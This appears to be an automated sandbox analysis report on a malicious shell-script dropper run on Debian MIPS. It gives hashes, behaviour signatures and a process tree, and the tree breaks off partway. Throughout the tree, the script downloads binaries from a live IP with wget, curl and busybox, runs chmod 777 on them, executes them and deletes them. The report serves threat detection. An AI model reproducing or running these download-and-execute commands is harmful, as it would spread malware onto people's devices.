Analysis
-
max time kernel
70s -
max time network
72s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:33
Static task
static1
Behavioral task
behavioral1
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
-
Size
10KB
-
MD5
766dedc13963c6b6ee0d4904bf619106
-
SHA1
3b93a1c4a9df4d54c75ef3b445ca55244506866c
-
SHA256
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264
-
SHA512
708c383986fa3596893356ad7ced7c503f4bdab762a319ff71291af63bf23e29ce72ae833bc4f47293c9031f7b78bc55a6a61f9d67585f39fb2412103eb6875b
-
SSDEEP
192:jbYbCQCoCnCuCKCzIkq3VdEZ1KVdEZ1PCQCoCnCuCKCEt:/YbCQCoCnCuCKCzIkqWCQCoCnCuCKCQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 782 chmod 982 chmod 880 chmod 892 chmod 940 chmod 748 chmod 817 chmod 904 chmod 916 chmod 934 chmod 741 chmod 952 chmod 958 chmod 898 chmod 910 chmod 976 chmod 860 chmod 868 chmod 964 chmod 922 chmod 928 chmod 823 chmod 874 chmod 886 chmod 810 chmod 970 chmod 754 chmod 946 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW 743 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc 749 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt 755 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 783 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT 811 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal 818 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 824 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 861 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV 869 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB 875 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF 881 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U 887 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES 893 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB 899 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB 905 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal 911 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 917 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 923 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV 929 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U 935 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF 941 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB 947 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES 953 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT 959 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW 965 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc 971 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt 977 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 983 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U curl File opened for modification /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc curl File opened for modification /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt curl File opened for modification /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF curl File opened for modification /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 curl File opened for modification /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc curl File opened for modification /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal curl File opened for modification /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES curl File opened for modification /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF curl File opened for modification /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB curl File opened for modification /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal curl File opened for modification /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT curl File opened for modification /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 curl File opened for modification /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW curl File opened for modification /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 curl File opened for modification /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB curl File opened for modification /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt curl File opened for modification /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U curl File opened for modification /tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB curl File opened for modification /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB curl File opened for modification /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 curl File opened for modification /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES curl File opened for modification /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT curl File opened for modification /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 curl File opened for modification /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 curl File opened for modification /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV curl File opened for modification /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV curl File opened for modification /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW curl
Processes
-
/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:739
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:747
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:753
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:776
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:786
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:806
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:816
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:822
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:854
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:867
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:873
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:879
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:885
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:891
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:897
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:903
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:909
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:915
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:921
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:927
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:933
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:939
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
